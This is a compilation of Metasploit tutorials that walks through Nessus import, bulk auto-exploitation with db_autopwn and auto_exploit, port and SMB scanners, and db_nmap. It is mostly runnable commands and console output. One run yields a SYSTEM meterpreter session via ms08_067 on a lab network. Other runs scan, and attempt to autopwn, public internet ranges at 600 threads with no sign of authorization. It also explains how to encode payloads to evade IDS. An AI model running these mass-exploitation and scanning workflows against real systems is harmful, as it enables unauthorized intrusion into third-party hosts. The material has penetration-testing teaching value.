1041  tcp       1         dce-rpc        1      2      0      0
3389  tcp       3         msrdp          1      3      2      1
3790  tcp       2         www            1      16     5      0
4500  udp       1         ipsec-nat-t?   1      1      0      0
[*] You can:
[*]         Get detailed scan infromation about a specfic port: nessus_report_host_detail <hostname> <port> <protocol> <report id>
msf >
[/bash]

View the scan details for a given port on a given IP

[bash]
msf > nessus_report_host_detail 192.168.8.7 3389 tcp 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Port Info
[+]
Port              Severity  PluginID  Plugin Name                                                                                                     CVSS2  Exploit?  CVE                Risk Factor  CVSS Vector
----              --------  --------  -----------                                                                                                     -----  --------  ---                -----------  -----------
msrdp (3389/tcp)  1         34252     Microsoft Windows Remote Listeners Enumeration (WMI)                                                            none   .         []                 None         .
msrdp (3389/tcp)  1         10940     Windows Terminal Services Enabled                                                                               none   .         []                 None         .
msrdp (3389/tcp)  2         57690     Terminal Services Encryption Level is Medium or Low                                                             4.3    .         []                 Medium       CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  1         30218     Terminal Services Encryption Level is not FIPS-140 Compliant                                                    2.6    .         []                 Low          CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  2         18405     Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness                                     5.1    true      ["CVE-2005-1794"]  Medium       CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P
msrdp (3389/tcp)  3         58435     MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) (uncredentialed check)  9.3    true      ["CVE-2012-0002"]  High         CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C
msf >
[/bash]

Import a scan report

[bash]
msf > nessus_report_get
[*] Usage:
[*]        nessus_report_get <report id>
[*]        use nessus_report_list to list all available reports for importing
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.9
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >
[/bash]

View the scanned hosts

[bash]
msf > hosts -c address,os_name,os_flavor,os_sp,vulns
Hosts
=====
address       os_name                   os_flavor  os_sp  vulns
-------       -------                   ---------  -----  -----
10.0.2.15     Microsoft Windows         XP         SP3    0
192.168.8.1   Linux                                       17
192.168.8.2   Microsoft Windows         7                 17
192.168.8.3   Microsoft Windows         2003       SP2    21
192.168.8.4   Microsoft Windows         7                 17
192.168.8.5   Microsoft Windows         2003       SP2    289
192.168.8.6   Microsoft Windows         XP                20
192.168.8.7   Microsoft Windows         2003       SP2    369
192.168.8.8   Linux  3.2.6 on Ubuntu 1                    48
[/bash]

View the vulnerabilities found on the hosts

[bash]
msf > vulns
[*] Time: 2012-04-16 06:14:35 UTC Vuln: host=192.168.8.7 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Traceroute Information refs=NSS-10287
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Nessus Scan Information refs=NSS-19506
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Windows Summary of Missing Patches refs=NSS-38153
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Common Platform Enumeration (CPE) refs=NSS-45590
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Office Detection refs=NSS-27524
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Device Type refs=NSS-54615
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=OS Identification refs=NSS-11936
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows - Local Users Information : Disabled accounts refs=OSVDB-752,NSS-10913
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows - Local Users Information : Passwords never expire refs=OSVDB-755,NSS-10916
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows - Local Users Information : User has never logged on refs=OSVDB-754,NSS-10915
[/bash]

...... (omitted)

We can also use the auto_exploit plugin to exploit hosts in bulk.
Start PostgreSQL and create a database:

root@bt:/opt/nessus/sbin# /etc/init.d/postgresql-8.4 start
 * Starting PostgreSQL 8.4 database server
root@bt:~# psql -U postgres -h localhost
Password for user postgres:
psql (8.4.10)
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.
postgres=# CREATE DATABASE fuck;
CREATE DATABASE
postgres=#

Connect msf to PostgreSQL. db_status shows the console is already attached to the bundled msf3dev database; db_connect switches it to the one just created. Note that the password on the db_connect line (123456 here) is saved in plaintext in the msfconsole history; passing a YAML file with db_connect -y keeps it out of the history.

msf > db_status
[*] postgresql connected to msf3dev
msf > db_connect postgres:123456@localhost:5432/fuck

List the Nessus reports and import one of them

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
--                                                    ----  ------     ----
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

Load auto_exploit and run vuln_exploit, which picks exploits from the imported vulnerability references

msf > load auto_exploit
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP’s and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.
msf > vuln_exploit
# run omitted: it died with a Ruby error on this install

Alternatively, db_autopwn works better here:

msf > load db_autopwn
msf > db_autopwn -t -e -p
............. (output truncated)
[*] (535/535 [1 sessions]): Waiting on 10 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 5 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============
  Id  Type                   Information                            Connection                                            Via
  --  ----                   -----------                            ----------                                            ---
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)  exploit/windows/smb/ms08_067_netapi
[*] ================================================================================
msf > sessions -l
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)
msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > ipconfig
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 65539
============
Name         : AMD PCNET Family PCI Ethernet Adapter
Hardware MAC : 08:00:27:0d:dd:65
MTU          : 1500
IPv4 Address : 192.168.8.5
IPv4 Netmask : 255.255.255.0
meterpreter > background
[*] Backgrounding session 1…

auto_exploit.rb:auto_exploit

Metasploit Framework: miscellaneous notes

1. Directory structure

metasploit framework
Updating: change into the metasploit framework directory
and run svn update to pull the latest files

MSF directory structure:
data: the Meterpreter, PassiveX and VNC DLLs, some user-interface code such as msfweb, and data files used by plugins

documentation: the MSF documentation, sample Ruby scripts and the MSF API

external: source code for the Meterpreter, VNC and PassiveX payloads

lib: the Ruby libraries MSF is built on

modules: the exploit, payload, nop, encoder and auxiliary modules

plugins: database-connection plugins, IPS filter code and other plugin code

scripts: Meterpreter scripts runnable from the Ruby shell; currently includes scripts that kill the target's antivirus and migrate the Meterpreter server instance into another process

.svn: files and data used by the Subversion client to talk to the SVN server

tools: assorted useful scripts and small utilities

2. Core commands

msfconsole core commands
msfconsole
Several sessions can run concurrently, and commands such as sessions and jobs let you interact with them,
list and kill running jobs, and create multiple sessions from a single exploit,
i.e. launch one exploit against a user-supplied list of hosts.
A session is sent to the background with Ctrl+Z and stopped with Ctrl+C.
MSF ships with a powerful API that is reachable from msfconsole:
drop into the interactive Ruby shell (irb) and you can work directly with the session and framework objects.

Core commands:
? help menu
back move back from the current context
banner display an MSF banner
cd change the current working directory
color toggle color
connect communicate with a host
exit exit MSF
help help menu
info display information about one or more modules
irb drop into irb scripting mode
jobs display and manage jobs
kill kill a job
load load a plugin
loadpath search for and load modules from a path
quit exit MSF
resource run the commands stored in a file
route route traffic through a session (pivoting)
save save the active datastores
search search module names and descriptions
set set a variable to a value
setg set a global variable
show display modules of a given type, or all modules
sleep do nothing for the given number of seconds
unload unload a plugin
unset unset one or more variables
unsetg unset one or more global variables
use select a module by name
version show the framework and console library version numbers

3. Metasploit module types

metasploit module types || main MSF commands || database commands

-------------------------------------------------
exploits:

Put simply, exploits are programs that exploit specific known vulnerabilities.
show exploits prints three columns:
exploit name, rank and description.
Exploit naming convention:
operating system/service/module name
e.g. windows/vnc/realvnc_client
The rank indicates how reliable the module is.
The description is a short summary of the vulnerability.
Show an exploit's details: info <module name>

Select an exploit: use exploit/windows/vnc/realvnc_client
List the exploit's settings: show options
Settings marked required in the options must be set.
List the target types the exploit can attack: show targets
Set an option: set OPTION value (e.g. set RHOST 192.168.0.1)
Set the target: set TARGET number (e.g. set TARGET 2)
-------------------------------------------------
payloads module

A payload is the shellcode: the code that runs once the exploit succeeds. MSF ships a large number of ready-made payloads.
After selecting an exploit module and setting its options, show payloads lists the payloads compatible with that exploit.
Payload naming convention:
operating system/type/name, e.g. windows/shell/bind_tcp
The main types:
shell: get a command shell
dllinject: upload a DLL and inject it into a process
patchup*: patch-up variants of the above stagers
upexec: upload and execute a file
meterpreter: advanced payload
vncinject: advanced payload
passivex: advanced payload
Payload name conventions:
- shell_find_tag: spawn a shell on an already established connection
- shell_reverse_tcp: connect back to the attacker and spawn a shell
- bind_tcp: listen for a TCP connection
- reverse_tcp: connect back to the attacker over TCP
- reverse_http: tunnel communication over HTTP
- add_user: create a new user and add it to the administrators group
- xxx_ipv6_tcp: over IPv6
- xxx_nonx_tcp: for targets without NX/DEP (NX is a CPU feature that refuses to execute code from data pages, which defeats classic buffer-overflow payloads)
- xxx_ord_tcp: ordinal stager (resolves the ws2_32 functions it needs by ordinal, giving a smaller stager)
- xxx_tcp_allports: try every possible port
- for details see http://www.offensive-security.com/metasploit-unleashed/A-Bit-About-Payloads
Set the payload: set PAYLOAD payload_name
List the options again: show options
Then set them: set RHOST 192.168.0.1
With the exploit and payload configured, the target can be exploited.
Because a payload is just a sequence of assembly instructions, usually preceded by a NOP sled,
that sequence can serve as a signature for detecting the attack. Payloads therefore need to be encoded and the NOP sled varied to evade IDS/IPS.
MSF provides several encoders and NOP generators
that make detection considerably harder.
-------------------------------------------------

Attack demonstration:

attacking by MSF
A simple example:
remote exploitation of a Windows server,
a walkthrough of the ms08_067 case

CTRL+Z sends the session to the background
sessions
shows the backgrounded sessions
sessions -h
sessions -i 1 // re-attach to session 1
CTRL+C breaks the connection

----------------------------
Execution flow:
1. Connect to the vulnerable port on the remote system
2. Exchange protocol messages until the vulnerable code path is reached
3. Inject the exploit code, which directly or indirectly overwrites the return address with the address of our payload, plus NOP instructions,
which increase the chance that our code is executed
4. Post-exploitation: connecting to the remote system as a newly created user, or possibly with a GUI client
-------------------------------------------------
auxiliary, encoders and nops modules

nops: the exact address where execution lands relative to the shellcode is often not known precisely, so a NOP sled is prepended to the payload to absorb the error; NOP generators also produce varied sleds so that the sled itself does not trigger IDS signatures
encoders: similar purpose to nops, since the payload itself can trigger IDS signatures. An encoder transforms the payload so that it is not recognized on the wire; a decoder stub restores it on the target and runs it as planned.
auxiliary: a collection of helper modules for fingerprinting, vulnerability scanning, brute forcing, SQL injection, DoS, spoofing, sniffing, fuzzing and so on
-------------------------------------------------
Msfcli interface
msfcli lets you run an exploit straight from the command line without starting msfconsole first. That makes it handy for quick one-off attacks where everything is given as command-line arguments, and for testing a large number of systems for the same vulnerability.
You can also write a simple shell script that takes an IP range and runs the exploit against each target in turn.
msfcli -h shows the help
S: show module information
P: available payloads
O: options
T: available targets
E: execute the exploit
--------
A simple example:
1. Show the selected exploit module's information
./msfcli <exploit_name> S
2. Show the available payloads:
./msfcli <exploit_name> P
3. Choose a payload for the exploit and show the options that need to be set
./msfcli <exp> PAYLOAD=<payload> O
4. Set the required options and list the available targets:
./msfcli <exp> PAYLOAD=<payload> option=value T
5. Set the target and run the exploit
./msfcli <exp> PAYLOAD=<payload> option=value TARGET=number E
------------------------------
msfweb gives a friendly web interface to the modules:
exploits: exploit modules, with search
auxiliary: auxiliary modules, with search
payloads: payload modules, with search
console: a web-based console equivalent to msfconsole
sessions: current session information
options: appearance settings
about: msfweb version information
-------------------------------------------------
msfd interface
msfd exposes msfconsole over a network socket: it binds to a given IP address and port and waits for incoming connections, letting one or more users on remote systems connect into MSF.
Example:
local host: msfd -a 192.168.1.14 -p 2323
remote host: nc 192.168.1.14 2323
Disconnecting on the local side:
taskkill /pid <pid> /f (force kill)
Note that -a must be an IP address assigned to the local host; binding to any other address fails.
Caveat: msfd performs no authentication and no encryption. Anyone who can reach the port gets a full msfconsole running with msfd's privileges (usually root), so bind it to 127.0.0.1 and reach it through an SSH tunnel rather than exposing it on a network interface.
-------------------------------------------------
msfpayload and msfencode

msfpayload: generates the framework's existing payloads from the command line and outputs them as C, Perl or raw bytes. -h lists the options; S shows the details of a given payload. Once a payload is chosen, msfpayload takes its parameters and an output format: C emits a C array, P emits a Perl script, and R emits raw bytes, which can be piped into another program such as msfencode or redirected to a file. For windows/exec the CMD parameter sets the command to run after successful exploitation; for example, to run dir and emit Perl: ./msfpayload windows/exec CMD=dir P

msfencode: a utility that gives direct access to the framework's payload encoders. -l lists the available encoders and -h the options. Generating a raw payload with msfpayload and piping it straight into msfencode (or reading it from a file) is the simple way to use it. Encoding ensures that bad characters do not appear in the payload and, as a side effect, improves IDS evasion.
bad characters:
Many applications filter or transform their input; a web server, for instance, may preprocess Unicode encoding before the data reaches the vulnerable code, so the payload could be modified and fail to run.
Some characters also terminate strings, such as the NULL byte (0x00), and must be avoided too. Work out which characters the preprocessing mangles, then have the encoder avoid them.
----------------------
database backend commands
MSF supports several databases, currently SQLite3 (driver bundled), MySQL and PostgreSQL, for tracking target vulnerabilities and automating exploitation. It can import amap, nmap or Nessus scan reports and then attempt exploits automatically against the open ports and probable vulnerabilities of each target, which saves a pentester a great deal of time.
Database backend commands (these are the 3.x names; in 4.x they were collapsed into db_import, hosts, services, notes, vulns and workspace, as in the help output shown further down):
db_add_host add one or more hosts to the database
db_add_note add a note to a host
db_add_port add a port to a host
db_connect connect to an existing database instance
db_create create a new database instance
db_del_host delete one or more hosts from the database
db_del_port delete a port from the database
db_destroy delete an existing database
db_disconnect disconnect from the current database instance
db_driver specify a database driver
db_hosts list all hosts in the database
db_nmap run Nmap and record the output
db_notes list all notes in the database
db_services list all services in the database
db_vulns list all vulnerabilities in the database
db_workspace switch database workspaces
db_import_ip_list import a file containing a list of IPs
db_import_amap_mlog import a THC-Amap scan result file (-o, -m)
db_import_nessus_nbe import a Nessus scan result file (NBE)
db_import_nessus_xml import a Nessus XML scan result file
db_import_nmap_xml import an Nmap XML scan result file (-oX)
db_autopwn automated exploitation

4. db_autopwn
db_autopwn
Parameters:
-h show help
-t show all matching exploit modules
-x select modules based on vulnerability references
-p select modules based on open ports
-e launch every matching exploit against the targets
-r use a reverse-connect shell
-b use a bind shell on a random port
-q disable exploit output
-l [range] only exploit hosts in this range
-X [range] always exclude hosts in this range
-PI [range] only exploit hosts with these ports open
-PX [range] always exclude hosts with these ports open
-m [regex] only run modules whose name matches the regular expression
-------------------------------------
Successful example:
db_nmap -sV 192.168.1.110 --- scan the host
db_autopwn -p -e -b ----- attack automatically, matching on ports and using bind shells

Collected by Hlly_M风迷
qing.weibo.com/hllym

A starter on metasploit scanners: portscan and scanner/smb/smb_version

Port scanning modules:

[bash]

msf > search portscan

Matching Modules
================

Name                                     Disclosure Date  Rank    Description
----                                     ---------------  ----    -----------
auxiliary/scanner/natpmp/natpmp_portscan                  normal  NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack                            normal  TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce                      normal  FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn                            normal  TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp                            normal  TCP Port Scanner
auxiliary/scanner/portscan/xmas                           normal  TCP "XMas" Port Scanner
msf >

[/bash]

The port scanners above are all used in much the same way; they differ only in scan type and purpose, so pick the one that fits the job.

Taking one of them as an example:

[bash]

msf > use auxiliary/scanner/portscan/ftpbounce
msf auxiliary(ftpbounce) > show options

Module options (auxiliary/scanner/portscan/ftpbounce):

Name        Current Setting      Required  Description
----        ---------------      --------  -----------
BOUNCEHOST                       yes       FTP relay host
BOUNCEPORT  21                   yes       FTP relay port
FTPPASS     mozilla@example.com  no        The password for the specified username
FTPUSER     anonymous            no        The username to authenticate as
PORTS       1-10000              yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS                           yes       The target address range or CIDR identifier
THREADS     1                    yes       The number of concurrent threads

msf auxiliary(ftpbounce) > set RHOSTS 108.171.217.91/24
RHOSTS => 108.171.217.91/24
msf auxiliary(ftpbounce) > set THREADS 600
THREADS => 600
msf auxiliary(ftpbounce) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: BOUNCEHOST.
msf auxiliary(ftpbounce) > set BOUNCEHOST 110.120.119.54
BOUNCEHOST => 110.120.119.54
msf auxiliary(ftpbounce) > run

[*] Scanned 107 of 256 hosts (041% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftpbounce) >

[/bash]

The other portscan modules work the same way. Note that the first run above failed validation: BOUNCEHOST, the FTP server that relays the probes, is required, and the scan only works if that server still honours PORT commands pointing at third-party addresses.

Identifying the target's operating system:

smb: Server Message Block

[bash]

msf auxiliary(ftpbounce) > back
msf > search scanner/smb

Matching Modules
================

Name                                        Disclosure Date  Rank    Description
----                                        ---------------  ----    -----------
auxiliary/scanner/smb/pipe_auditor                           normal  SMB Session Pipe Auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor                    normal  SMB Session Pipe DCERPC Auditor
auxiliary/scanner/smb/smb2                                   normal  SMB 2.0 Protocol Detection
auxiliary/scanner/smb/smb_enumshares                         normal  SMB Share Enumeration
auxiliary/scanner/smb/smb_enumusers                          normal  SMB User Enumeration (SAM EnumUsers)
auxiliary/scanner/smb/smb_enumusers_domain                   normal  SMB Domain User Enumeration
auxiliary/scanner/smb/smb_login                              normal  SMB Login Check Scanner
auxiliary/scanner/smb/smb_lookupsid                          normal  SMB Local User Enumeration (LookupSid)
auxiliary/scanner/smb/smb_version                            normal  SMB Version Detection
msf >

[/bash]

smb/smb_version, used as shown below, identifies the target's operating system from the SMB negotiation. Against servers on the internet it usually gets nothing back, because port 445 is nearly always filtered at the perimeter.

Against personal computers on a LAN, however, it is very useful and normally returns the OS type.

[bash]

msf auxiliary(smb_version) > back
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name       Current Setting   Required  Description
----       ---------------   --------  -----------
RHOSTS     108.171.217.0/24  yes       The target address range or CIDR identifier
SMBDomain  WORKGROUP         no        The Windows domain to use for authentication
SMBPass                      no        The password for the specified username
SMBUser                      no        The username to authenticate as
THREADS    1024              yes       The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 118.123.106.56/24
RHOSTS => 118.123.106.56/24
msf auxiliary(smb_version) > set THREADS 600
THREADS => 600
msf auxiliary(smb_version) > run

[*] Scanned 042 of 256 hosts (016% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 120 of 256 hosts (046% complete)
[*] Scanned 127 of 256 hosts (049% complete)
[*] Scanned 136 of 256 hosts (053% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 245 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

[/bash]

Nmap scanning from metasploit, by example

Check the database connection status. Metasploit 4.0 and later connects to the bundled database automatically, so the old load db_mysql followed by db_connect is no longer necessary.

[bash]

msf > db_status
[*] postgresql connected to msf3dev

[/bash]

To see the db_ commands, type db_ and press Tab twice; you get the following.

[bash]

msf > db_
db_connect db_export db_nmap db_status
db_disconnect db_import db_rebuild_cache

[/bash]

Of course, the help command works too.

[bash]

msf > help

Core Commands
=============

Command          Description
-------          -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off of the module stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================

Command          Description
-------          -----------
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces

msf >

[/bash]

db_nmap scans a host's ports and discovers services. Common options:

-A : aggressive scan (OS detection, version detection, script scanning and traceroute)

-sS : TCP SYN (half-open) scan; the handshake is never completed, so the connection is less likely to show up in application logs. Cannot be combined with -sI.

-sI <zombie ip> : idle scan. The probes are bounced off the zombie host, so the target only ever sees that host scanning it. (The zombie must be idle and have a predictable IP ID sequence.)

-oX <file> : write the results to <file> as XML, so that db_import can load them into metasploit, after which db_autopwn can take over the automated break-in.

-Pn : skip host discovery. Do not ping first to decide whether a host is alive. Long, long ago, ping was a reliable liveness check, but ever since it was found that ping can be used to launch DDoS attacks,

hosts and firewalls have dropped or rate-limited ICMP echo, so no ping reply no longer means the host is down. You know how it is.

Oh, and one more important one:

-v : show scan progress. Without it you may think nmap has hung and Ctrl-C it out of impatience.

 

So, a typical scan command:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:27 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 256 hosts. at 19:27
Completed Parallel DNS resolution of 256 hosts. at 19:27, 2.24s elapsed
Initiating SYN Stealth Scan at 19:27
Scanning 64 hosts [1000 ports/host]
Discovered open port 53/tcp on 108.171.217.50
SYN Stealth Scan Timing: About 1.06% done; ETC: 20:15 (0:48:02 remaining)
Discovered open port 53/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.50
Discovered open port 53/tcp on 108.171.217.53
Discovered open port 53/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.18
Discovered open port 443/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.35
Discovered open port 53/tcp on 108.171.217.52
Discovered open port 80/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.50
Discovered open port 80/tcp on 108.171.217.51

# (large block omitted)

[/bash]

Then:

db_import ieroot

ieroot is the result file of the nmap scan above.

Then:

load db_autopwn

and db_autopwn finds and attacks the exploitable hosts automatically.

A few common db_autopwn parameters:

-e : launch the exploits against every host in the scan results stored in the database

-t : show all matching modules

-r : use a reverse connection. Reverse connections have a real advantage: they get through firewalls that block inbound connections

-x : select exploit modules by vulnerability reference

-p : select exploit modules by open port. Many hosts run their services on non-default ports, which makes -p match the wrong modules, so use it with care

So the process is:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:35 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:35
Completed Parallel DNS resolution of 1 host. at 19:35, 0.00s elapsed
Initiating SYN Stealth Scan at 19:35
Scanning 108-171-217-51.static.webnx.com (108.171.217.51) [1000 ports]
Completed SYN Stealth Scan at 19:36, 17.18s elapsed (1000 total ports)
Initiating Service scan at 19:36
Initiating OS detection (try #1) against 108-171-217-51.static.webnx.com (108.171.217.51)
Initiating Traceroute at 19:36
Completed Traceroute at 19:36, 3.03s elapsed
Initiating Parallel DNS resolution of 19 hosts. at 19:36
Completed Parallel DNS resolution of 19 hosts. at 19:36, 13.00s elapsed
NSE: Script scanning 108.171.217.51.
Initiating NSE at 19:36
Completed NSE at 19:36, 10.00s elapsed
Nmap scan report for 108-171-217-51.static.webnx.com (108.171.217.51)
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp closed http
8888/tcp closed sun-answerbook
Too many fingerprints match this host to give specific OS details
Network Distance: 20 hops

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.76 ms 121.250.211.1
2 …
3 48.77 ms 202.194.0.125
4 0.62 ms 202.194.0.45
5 0.89 ms 58.194.164.174
6 1.70 ms 222.173.20.205
7 1.63 ms 60.235.2.77
8 11.68 ms 60.235.0.73
9 10.23 ms 202.97.42.174
10 23.02 ms 202.97.40.9
11 21.08 ms 202.97.33.30
12 21.44 ms 202.97.33.190
13 155.27 ms 202.97.50.122
14 324.65 ms 202.97.49.158
15 315.15 ms 10gigabitethernet6-1.core1.lax1.he.net (64.71.131.133)
16 320.71 ms 10gigabitethernet1-3.core1.lax2.he.net (72.52.92.122)
17 314.85 ms 216.218.213.250
18 320.26 ms 100-42-223-146.static.webnx.com (100.42.223.146)
19 299.95 ms 100-42-223-198.static.webnx.com (100.42.223.198)
20 309.17 ms 108-171-217-51.static.webnx.com (108.171.217.51)

Read data files from: /opt/metasploit/common/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.88 seconds
Raw packets sent: 2059 (92.876KB) | Rcvd: 33 (1.688KB)
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------

msf > db_import ieroot
[*] Importing ‘Nmap XML’ data
[*] Import: Parsing with ‘Rex::Parser::NmapXMLStreamParser’
[*] Importing host 108.171.217.51
[*] Successfully imported /root/ieroot
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

msf >

[/bash]

[bash]

msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -e -p -t
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it’s current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[-]
[*] Analysis completed in 44 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] ================================================================================
[*]
[*]
[*] The autopwn command has completed with 0 sessions

msf > sessions -l

Active sessions
===============

No active sessions.

msf > hosts -d

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

[*] Deleted 1 hosts
msf >

[/bash]

Sessions don't come easily. If you get one, sessions -i 1 attaches to the first session, and so on for the others. Once you have a shell there's not much more to say. (Note that hosts -d above deletes the imported host from the database; it only cleans up the example.)
